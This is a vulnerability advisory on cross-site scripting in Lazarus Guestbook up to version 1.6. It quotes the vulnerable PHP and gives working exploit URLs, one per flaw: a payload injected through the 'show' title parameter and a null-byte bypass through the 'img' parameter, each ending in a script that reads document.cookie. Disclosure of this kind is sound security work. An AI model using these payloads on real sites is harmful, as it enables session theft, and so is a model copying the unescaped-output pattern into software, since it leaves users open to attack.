Produce : Lazarus Guestbook

Website : http://carbonize.co.uk/Lazarus/

Version : <= 1.6

Problem : Cross Site Scripting


1) 

The first probleme is in codes-english.php ,"show" parameter in 
lang/codes-english.php isn't properly sanitised

This can be exploited to execute arbitrary HTML and javascript code


 Vulnerable code in  lang/codes-english.php near line 4


1  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

2  <html>

3  <head>

4  <title><?php echo($_GET['show']); ?></title> 


Exploit : 


http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>



2)

the seconde probleme is in picture.php , the script verifiy fist if image file 
exists

after it display it ,


vulnerable code : in picture.php

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24  if (!empty($_GET['img'])) {

26      if (file_exists("$GB_TMP/$_GET[img]")) {

27          $size = @GetImageSize("$GB_TMP/$_GET[img]");

28          $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";

29      }

..      ............

49      <td align="center" valign="middle">

50      <?php

51        if (!empty($_GET['img']) && is_array($size)) {

52            echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" 
width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";

53        }

54    ?>

55    </td>    

    

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    if magic_quote_gpc = OFF we can bypass this protection by specifing 
existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )

    

    POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]

    

    file_exists("$GB_TMP/$_GET[img]") will return true and html code will be 
executed

    

    Exploit: 

    

    http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]

    
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>

    

Contact : simo64[at]gmail[dot]com

Moroccan Security Research Team

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